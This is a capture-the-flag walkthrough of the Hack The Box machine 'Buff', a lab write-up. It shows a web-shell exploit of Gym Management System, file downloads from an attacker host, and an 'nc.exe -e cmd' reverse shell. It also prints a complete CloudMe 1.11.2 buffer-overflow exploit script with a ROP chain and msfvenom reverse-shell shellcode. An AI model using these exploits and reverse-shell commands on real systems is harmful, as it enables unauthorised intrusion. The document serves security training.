Buff


1. User

1.1. Recon

1.1.1. Port Scan

┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# nmap 10.10.10.198 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 10:14 EDT
Nmap scan report for 10.10.10.198
Host is up (0.099s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
7680/tcp open  pando-pub
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds

┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# nmap 10.10.10.198 -sU --top-ports 100 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 10:15 EDT
Nmap scan report for 10.10.10.198
Host is up (0.13s latency).
All 100 scanned ports on 10.10.10.198 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds

1.1.2. dirsearch

┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# dirsearch -u http://10.10.10.198:8080/ -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/buff/reports/http_10.10.10.198_8080/__25-09-25_10-20-52.txt

Target: http://10.10.10.198:8080/

[10:20:52] Starting: 
[10:21:02] 200 -   66B  - /.gitattributes
[10:21:15] 200 -    5KB - /about.php
[10:21:40] 200 -    2KB - /cgi-bin/printenv.pl
[10:21:46] 200 -    4KB - /contact.php
[10:21:52] 200 -    4KB - /edit.php
[10:21:53] 503 -    1KB - /examples/
[10:21:53] 503 -    1KB - /examples/servlets/index.html
[10:21:53] 503 -    1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:21:53] 503 -    1KB - /examples/servlet/SnoopServlet
[10:21:53] 503 -    1KB - /examples/jsp/index.html
[10:21:53] 503 -    1KB - /examples/websocket/index.xhtml
[10:21:53] 503 -    1KB - /examples/jsp/snp/snoop.jsp
[10:21:53] 503 -    1KB - /examples/servlets/servlet/CookieExample
[10:21:53] 503 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[10:21:53] 503 -    1KB - /examples
[10:21:55] 200 -    4KB - /feedback.php
[10:21:58] 200 -  143B  - /home.php
[10:21:59] 301 -  341B  - /img  ->  http://10.10.10.198:8080/img/
[10:21:59] 301 -  345B  - /include  ->  http://10.10.10.198:8080/include/
[10:22:04] 200 -   18KB - /LICENSE
[10:22:05] 200 -   18KB - /license
[10:22:20] 301 -  345B  - /profile  ->  http://10.10.10.198:8080/profile/
[10:22:21] 200 -  309B  - /README.MD
[10:22:21] 200 -  309B  - /README.md
[10:22:21] 200 -  309B  - /readme.md
[10:22:21] 200 -  309B  - /ReadMe.md
[10:22:21] 200 -  309B  - /Readme.md
[10:22:24] 200 -  137B  - /register.php
[10:22:34] 301 -  344B  - /Upload  ->  http://10.10.10.198:8080/Upload/
[10:22:34] 200 -  209B  - /up.php
[10:22:34] 301 -  344B  - /upload  ->  http://10.10.10.198:8080/upload/
[10:22:35] 200 -  107B  - /upload.php

Task Completed

1.1.3. 8080


Registration page: after clicking the button it redirects to the home page.
Upload page: the error message leaks the filesystem path, so a web shell can be written there.

up.php also errors out

Readme.md

It mentions a table.sql file, from which the database schema information can be obtained.

contact.php
The application is Gym Management System 1.0.

Save the public exploit script for this version and run it directly:

┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# python2 exp.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami

buff\shaun

C:\xampp\htdocs\gym\upload> id


C:\xampp\htdocs\gym\upload> whoami /priv


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Trying to get a reverse shell through PowerShell fails; this appears to be only a web shell, and certutil cannot download files either.

C:\xampp\htdocs\gym\upload> bitsadmin /transfer test http://10.10.14.23/nc.exe c:\temp\nc.exe        


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Unable to connect to BITS - 0x80070005

C:\xampp\htdocs\gym\upload> certutil -f -split -urlcache http://10.10.14.23/nc.exe

<br />
<b>Warning</b>:  shell_exec(): Unable to execute 'certutil -f -split -urlcache http://10.10.14.23/nc.exe' in <b>C:\xampp\htdocs\gym\upload\kamehameha.php</b> on line <b>3</b><br />

1.2. SMB Server

Transfer the file through an SMB server instead:

┌──(root㉿kali)-[~/Desktop/tools]
└─# impacket-smbserver SHARE ./ -user user -password pass -smb2support                                             
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed


C:\xampp\htdocs\gym\upload> net use \\10.10.14.23\SHARE /u:user pass

The command completed successfully.


C:\xampp\htdocs\gym\upload> copy \\10.10.14.23\SHARE\nc.exe C:\Users\Public\nc.exe

        1 file(s) copied.

Then spawn the reverse shell:

C:\xampp\htdocs\gym\upload> C:\Users\Public\nc.exe -e cmd 10.10.14.23 1234

┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# penelope -p 1234
[+] Listening for reverse shells on 0.0.0.0:1234 →  127.0.0.1 • 192.168.8.18 • 192.168.3.4 • 172.22.0.1 • 172.23.0.1 • 172.20.0.1 • 172.21.0.1 • 172.17.0.1 • 172.18.0.1 • 172.19.0.1 • 10.10.14.23
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from BUFF~10.10.10.198-Microsoft_Windows_10_Enterprise-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D 
[+] Logging to /root/.penelope/BUFF~10.10.10.198-Microsoft_Windows_10_Enterprise-x64-based_PC/2025_09_25-11_05_02-453.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
C:\xampp\htdocs\gym\upload>
c:\Users\shaun\Desktop>type user.txt
type user.txt
59a757ee931e44f71e0b22d710b4fbba

2. System

2.1. mysql (not useful)

C:\xampp\htdocs\gym>tree /F /A
Folder PATH listing
Volume serial number is A22D-49F7
C:.
|   .gitattributes
|   4.jpg
|   about.php
|   att.php
|   contact.php
|   edit.php
|   editp.php
|   facilities.php
|   Feedback.php
|   home.php
|   index.php
|   LICENSE
|   Navjeet.jpg
|   New Text Document.txt
|   packages.php
|   README.md
|   register.php
|   register_success.php
|   subfeed.php
|   table.sql
|   up.php
|   upload.php
|   
+---att
|       matt.php
|       matta.php
|       
+---boot
|   +---css
|   |   |   bootstrap-theme.css
|   |   |   bootstrap-theme.css.map
|   |   |   bootstrap-theme.min.css
|   |   |   bootstrap.css
|   |   |   bootstrap.css.map
|   |   |   bootstrap.min.css
|   |   |   jquery-ui-1.10.4.custom.css
|   |   |   jquery-ui-1.10.4.custom.min.css
|   |   |   jquery.bxslider.css
|   |   |   main.css
|   |   |   
|   |   \---images
|   |           bg1.JPG
|   |           bg2.jpg
|   |           bx_loader.gif
|   |           controls.png
|   |           
|   +---fonts
|   |       glyphicons-halflings-regular.eot
|   |       glyphicons-halflings-regular.svg
|   |       glyphicons-halflings-regular.ttf
|   |       glyphicons-halflings-regular.woff
|   |       
|   \---js
|       |   bootstrap.js
|       |   bootstrap.min.js
|       |   dialog.js
|       |   forms.js
|       |   jquery.bxslider.js
|       |   jquery.bxslider.min.js
|       |   sha512.js
|       |   slide.js
|       |   
|       \---plugins
|               jquery.easing.1.3.js
|               jquery.fitvids.js
|               
+---ex
|   |   about.php
|   |   att.php
|   |   contact.php
|   |   edit.php
|   |   editp.php
|   |   facilities.php
|   |   home.php
|   |   index.php
|   |   Navjeet.jpg
|   |   packages.php
|   |   register.php
|   |   register_success.php
|   |   up.php
|   |   upload.php
|   |   
|   +---admin
|   |       a.js
|   |       a.php
|   |       
|   +---att
|   |       matt.php
|   |       matta.php
|   |       
|   +---boot
|   |   |   readme(forslide).md
|   |   |   
|   |   +---css
|   |   |   |   bootstrap-theme.css
|   |   |   |   bootstrap-theme.css.map
|   |   |   |   bootstrap-theme.min.css
|   |   |   |   bootstrap.css
|   |   |   |   bootstrap.css.map
|   |   |   |   bootstrap.min.css
|   |   |   |   jquery-ui-1.10.4.custom.css
|   |   |   |   jquery-ui-1.10.4.custom.min.css
|   |   |   |   jquery.bxslider.css
|   |   |   |   main.css
|   |   |   |   
|   |   |   \---images
|   |   |           bx_loader.gif
|   |   |           controls.png
|   |   |           
|   |   +---fonts
|   |   |       glyphicons-halflings-regular.eot
|   |   |       glyphicons-halflings-regular.svg
|   |   |       glyphicons-halflings-regular.ttf
|   |   |       glyphicons-halflings-regular.woff
|   |   |       
|   |   \---js
|   |       |   bootstrap.js
|   |       |   bootstrap.min.js
|   |       |   dialog.js
|   |       |   forms.js
|   |       |   jquery.bxslider.js
|   |       |   jquery.bxslider.min.js
|   |       |   sha512.js
|   |       |   slide.js
|   |       |   
|   |       \---plugins
|   |               jquery.easing.1.3.js
|   |               jquery.fitvids.js
|   |               
|   +---img
|   |       1.jpg
|   |       2.jpg
|   |       3.jpg
|   |       4.jpg
|   |       5.jpg
|   |       6.jpg
|   |       7.jpg
|   |       8.jpg
|   |       aerobics.png
|   |       cardio.png
|   |       cards.png
|   |       dc.png
|   |       fw.png
|   |       hb.png
|   |       lockerroom.png
|   |       spa.png
|   |       strength.png
|   |       
|   +---include
|   |       db_connect.php
|   |       functions.php
|   |       logout.php
|   |       process_login.php
|   |       psl-config.php
|   |       register.inc.php
|   |       
|   +---profile
|   |   |   action.php
|   |   |   delete.php
|   |   |   edit.php
|   |   |   fun.php
|   |   |   i.php
|   |   |   index.php
|   |   |   
|   |   \---upload
|   |           gc.png
|   |           
|   \---workouts
|           index.php
|           
+---img
|       1.jpg
|       2.jpg
|       3.jpg
|       4.jpg
|       5.jpg
|       6.jpg
|       7.jpg
|       8.jpg
|       aerobics.png
|       cardio.png
|       cards.png
|       dc.png
|       fw.png
|       hb.png
|       lockerroom.png
|       pr 2.pdf
|       PROJECT REPORT(1) (1).pdf
|       spa.png
|       strength.png
|       thumb.png
|       w1.png
|       wp_ss_20140416_0002.png
|       wp_ss_20140416_0003.png
|       wp_ss_20140416_0004.png
|       wp_ss_20140416_0005.png
|       wp_ss_20140416_0006.png
|       wp_ss_20140419_0001.png
|       wp_ss_20140419_0002.png
|       wp_ss_20140419_0003.png
|       wp_ss_20140422_0001.png
|       wp_ss_20140516_0001.png
|       
+---include
|       db_connect.php
|       functions.php
|       logout.php
|       process_login.php
|       psl-config.php
|       register.inc.php
|       
+---profile
|   |   action.php
|   |   delete.php
|   |   edit.php
|   |   fun.php
|   |   i.php
|   |   index.php
|   |   
|   \---upload
|           gc.png
|           
+---upload
|       kamehameha.php
|       
\---workouts
        index.php
C:\xampp\htdocs\gym\include>type db_connect.php
<?php
include_once 'psl-config.php'; // As functions.php is not included
$mysqli = new mysqli("localhost", "root", "", "table");
?>

There is nothing of interest in here: the database is local-only and uses the root account with an empty password, which yields nothing further.

2.2. CloudMe

Looking at the network connections, you can see that local port 8888 is listening:

C:\xampp\htdocs\gym\upload>netstat -ano | findstr TCP | findstr ":0"

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6252
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       8912
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       8136
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       528
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1540
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2340
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       688
  TCP    10.129.25.107:139      0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8264
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6132
  TCP    [::]:135               [::]:0                 LISTENING       956
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       8912
  TCP    [::]:8080              [::]:0                 LISTENING       8136
  TCP    [::]:49664             [::]:0                 LISTENING       528
  TCP    [::]:49665             [::]:0                 LISTENING       1072
  TCP    [::]:49666             [::]:0                 LISTENING       1540
  TCP    [::]:49667             [::]:0                 LISTENING       2340
  TCP    [::]:49668             [::]:0                 LISTENING       668
  TCP    [::]:49669             [::]:0                 LISTENING       688

The PID of this listener changes very frequently, so the following one-liner looks up the owning process in the same command:

C:\xampp\htdocs\gym\upload>for /f "tokens=5" %i in ('netstat -ano ^| findstr ":8888 "') do @tasklist /fi "PID eq %i" /v

Image Name                     PID Session Name        Session#    Mem Usage Status          User Name                                              CPU Time Window Title                                                            
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
CloudMe.exe                   7908                            0     37,296 K Unknown         N/A                                                     0:00:01 N/A   
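As an added triage aid (not part of the original writeup), this Python 3 script does what the netstat/findstr pipeline above does by hand: it parses `netstat -ano` output, keeps LISTENING sockets, and reports which ports are bound only to loopback. Such services never appear in a remote port scan but become reachable as soon as an attacker has a local foothold, which is exactly how CloudMe on 127.0.0.1:8888 is found here. The sample rows are copied from the listing above, plus one constructed IPv6 row and one constructed ESTABLISHED row to exercise the parser.

```python
import re
from collections import namedtuple

# Sample netstat -ano rows: the first six are copied from the host output
# above; the [::1] and ESTABLISHED rows are constructed for the test.
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       8912
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       8136
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8264
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6132
  TCP    [::]:8080              [::]:0                 LISTENING       8136
  TCP    [::1]:8888             [::]:0                 LISTENING       6132
  TCP    10.129.25.107:49698    10.10.14.74:7788       ESTABLISHED     3124
"""

Listener = namedtuple("Listener", "proto addr port pid")

# One netstat -ano row: proto, local addr:port, foreign addr:port,
# optional state column (UDP rows have none), PID. The address group
# backtracks to the last ':' so bracketed IPv6 addresses parse correctly.
ROW_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+(?:(\S+)\s+)?(\d+)\s*$"
)

LOOPBACK = {"127.0.0.1", "[::1]"}


def parse_listeners(text):
    """Return a Listener for every TCP socket in LISTENING state."""
    found = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, blank or unrelated line
        proto, addr, port, state, pid = m.groups()
        if proto == "TCP" and state == "LISTENING":
            found.append(Listener(proto, addr, int(port), int(pid)))
    return found


def loopback_only(listeners):
    """Map port -> PID for ports that listen on loopback and nowhere else.

    A port that is also bound to 0.0.0.0 or [::] is externally exposed and
    is excluded; what remains is the set a remote scan cannot see.
    """
    exposed = {l.port for l in listeners if l.addr not in LOOPBACK}
    return {l.port: l.pid for l in listeners
            if l.addr in LOOPBACK and l.port not in exposed}


if __name__ == "__main__":
    hidden = loopback_only(parse_listeners(NETSTAT_SAMPLE))
    for port, pid in sorted(hidden.items()):
        print("loopback-only listener: port %d owned by pid %d" % (port, pid))
```

On the host above this reports 3306 (MySQL) and 8888 (CloudMe); the PID column is only a snapshot, so re-run it alongside tasklist as the writeup does.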

Locate the binary on disk:

dir /s /b C:\*CloudMe*
C:\Users\shaun\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\WEIKCYS4\CloudMe_1112[1].exe
C:\Users\shaun\Downloads\CloudMe_1112.exe

The first hit is the browser cache; the second is where the program lives.

CloudMe is cloud storage synchronisation software, and it has a well-known buffer overflow vulnerability:

  • CVE-2018-6892 - buffer overflow in CloudMe 1.11.2. This matches the file name CloudMe_1112.exe exactly, so the installed build is precisely the vulnerable version.

2.2.1. Tunnel setup

The exploitation strategy is shown in the figure below. Launched with Python 2.7, "ROPChain.py" sends a message to local port 8888, where CloudMe listens. Because of the vulnerability, part of that message (from byte 1053 onward) is interpreted by Windows as code: the ROP chain sets up VirtualProtect(), then the shellcode executes and opens calc.exe.

[figure: exploitation strategy diagram]

Since the service only listens on loopback, a proxy is needed to forward traffic into the target; Stowaway is used to build the tunnel.

First start an SMB server to serve the agent binary:

┌──(root㉿kali)-[~/Desktop/tools/stowaway]
└─# impacket-smbserver share ./ -user user -password pass -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

Then connect to the share and download the agent:

C:\Users\shaun\Downloads>net use \\10.10.14.74\share /u:user pass
net use \\10.10.14.74\share /u:user pass
The command completed successfully.


C:\Users\shaun\Downloads>copy \\10.10.14.74\share\windows_x64_agent.exe
copy \\10.10.14.74\share\windows_x64_agent.exe
        1 file(s) copied.

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

29/09/2025  16:33    <DIR>          .
29/09/2025  16:33    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
15/01/2025  08:16         2,278,912 windows_x64_agent.exe
               2 File(s)     20,109,736 bytes
               2 Dir(s)   8,828,096,512 bytes free

Set up the proxy: the agent connects back to the admin node, and a SOCKS listener is opened on the attacker side:

C:\Users\shaun\Downloads>windows_x64_agent.exe -c 10.10.14.74:4455
windows_x64_agent.exe -c 10.10.14.74:4455
2025/09/29 16:34:33 [*] Starting agent node actively.Connecting to 10.10.14.74:4455

[*] Starting admin node on port 4455

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
                                    { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 10.129.25.107:49694 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 1122
[*] Trying to listen on 0.0.0.0:1122......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >> 

Then point proxychains at the SOCKS port (1122) and the tunnel is ready.

2.2.2. shellcode

Next, adapt the payload. The original PoC launches calc.exe; it is replaced with a reverse shell that connects back through the tunnel.

# generate the shellcode
┌──(root㉿kali)-[~/Desktop/htb/buff/Cybersecurity-ROPChain]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.74 LPORT=7788 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of python file: 1604 bytes
buf =  b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
buf += b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
buf += b"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
buf += b"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
buf += b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a"
buf += b"\x0e\x4a\x68\x02\x00\x1e\x6c\x89\xe6\x6a\x10\x56"
buf += b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c"
buf += b"\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5"
buf += b"\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
buf += b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
buf += b"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
buf += b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f"
buf += b"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
buf += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
buf += b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

Replace the shellcode in ROPChain.py. The script below also fixes the original's mixing of str and bytes so it runs unchanged under both Python 2 and Python 3:

import socket
import struct

def create_rop_chain():
    # keep the original ROP chain unchanged
    rop_gadgets = [
        0x61ba8f81,  # POP EAX # RETN [Qt5Gui.dll]
        0x6210b0b0,  # ptr to &VirtualProtect() [IAT Qt5Gui.dll]
        0x61bdd7f5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
        0x61b63b3c,  # XCHG EAX,ESI # RETN [Qt5Gui.dll]

        0x0049f676,  # POP EDI # RET [CloudMe.exe]
        0x68cef5b4,  # RET [Qt5Core.dll]

        0x61c5ff72,  # POP EBP # RET [Qt5Gui.dll]
        0x66e2a5fe,  # ptr to "push esp" [Qt5Xml.dll]

        0x699d2d92,  # POP EBX # RET [Qt5Network.dll]
        0x00000201,  # dwSize Value

        0x6d9f7736,  # POP EDX # RET [Qt5Sql.dll]
        0x00000040,  # flNewProtect Value

        0x66e1a858,  # POP ECX # RET [Qt5Xml.dll]
        0x68db0e70,  # lpflOldProtectWriting address [Qt5Core.dll]

        0x007f8c38,  # POP EAX # RET
        0x90909090,  # NOP [CloudMe.exe]

        0x68a9fe85  # PUSHAD [Qt5Core.dll]
    ]
    # pack each gadget as a little-endian DWORD; b''.join keeps this bytes on Python 3
    return b''.join(struct.pack('<I', g) for g in rop_gadgets)

# reverse shell shellcode (msfvenom windows/shell_reverse_tcp, generated above)
shellcode = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    b"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
    b"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
    b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
    b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x4a\x68"
    b"\x02\x00\x1e\x6c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
    b"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
    b"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
    b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
    b"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
    b"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
    b"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
    b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
    b"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)

# key changes: target address and ROP chain
rop_chain = create_rop_chain()
# CloudMe only listens on the target's loopback; proxychains routes this
# connection through the SOCKS tunnel, so 127.0.0.1 is resolved on the victim.
target = "127.0.0.1"
junk = b"A" * 1052  # padding up to the overwritten return address

# compute trailing padding so the message keeps the PoC's total length (4096)
rmdr = b'\x44' * (3044 - len(rop_chain) - len(shellcode))
payload = junk + rop_chain + shellcode + rmdr

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(payload)
    print("Sent payload: len(payload) = {}".format(len(payload)))
    print("  junk: {}, rop: {}, shellcode: {}, rmdr: {}".format(
        len(junk), len(rop_chain), len(shellcode), len(rmdr)))
except Exception as e:
    print("Error: {}".format(e))

Start the listener and run the exploit through proxychains:

┌──(root㉿kali)-[~/Desktop/htb/buff/Cybersecurity-ROPChain]
└─# proxychains python2 ROPChain.py
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1122  ...  127.0.0.1:8888  ...  OK
Sent payload: len(payload) = 4096
  junk: 1052, rop: 68, shellcode: 324, rmdr: 2652
  
  
┌──(root㉿kali)-[~/Desktop/htb/buff/Cybersecurity-ROPChain]
└─# rlwrap nc -lvnp 7788             
listening on [any] 7788 ...
connect to [10.10.14.74] from (UNKNOWN) [10.129.25.107] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
